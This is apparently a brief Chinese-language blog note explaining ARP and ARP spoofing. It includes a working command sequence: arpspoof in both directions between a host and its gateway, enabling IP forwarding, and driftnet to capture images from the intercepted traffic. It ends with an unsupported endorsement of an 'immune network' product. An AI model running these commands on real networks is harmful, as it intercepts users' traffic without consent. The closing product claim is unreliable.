ARP(Address Resolution Protocol,地址解析協議)是一個位於TCP/IP協議棧中的網絡層,負責將某個IP地址解析成對應的MAC地址。
ARP協議的基本功能就是通過目標設備的IP地址,查詢目標設備的MAC地址,以保證通信的進行。
ARP***的侷限性
ARP***僅能在以太網(局域網如:機房、內網、公司網絡等)進行無法對外網(互聯網、非本區域內的局域網)進行***。
ARP***就是通過僞造IP地址和MAC地址實現ARP欺騙,能夠在網絡中產生大量的ARP通信量使網絡阻塞,***者只要持續不斷的發出僞造的ARP響應包就能更改目標主機ARP緩存中的IP-MAC條目,造成網絡中斷或中間人***。
arpspoof -i eth0 -t 172.28.15.4 172.28.15.254
echo 1 > /proc/sys/net/ipv4/ip_forward
driftnet
arpspoof -i eth0 -t 172.28.15.254 172.28.15.4
根據網上查詢,免疫網絡具有強大的網絡基礎安全和管理功能,免疫網絡確實真正解決了困擾已久的ARP問題,技術上是嚴謹的,應用上是可行的,成本也是相對低廉。